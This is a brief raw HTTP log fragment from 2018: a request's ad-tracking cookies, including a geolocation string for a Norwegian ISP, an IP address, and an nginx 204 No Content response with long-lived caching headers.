Cookie: SeenToday=1; OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; oaidts=1534816370; OAID=f8e2341405ecc01afe038fc56b44a136; OFR=%7B%2230265%22%3A2%7D; exsdsf=1534816370; pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; ltm_afu=1; f3d5bb63c9dbdcfb475795d659c65a4e=3f1HG4OdnWPOKNekIh9MuOMnhVjpwUsQT_kcDq0fUeQ; ppucnt=1; ppucntstart=1534816371; allcnt=1; _OACCAP[1283126]=1; _OACBLOCK[1283126]=1534816371; _OXCCLK[1283126]=1; _OXPCLK[136588]=1

                                         
                                         188.42.162.184
HTTP/1.1 204 No Content
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:54 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000, public, must-revalidate, proxy-revalidate
Pragma: public


--- Additional Info ---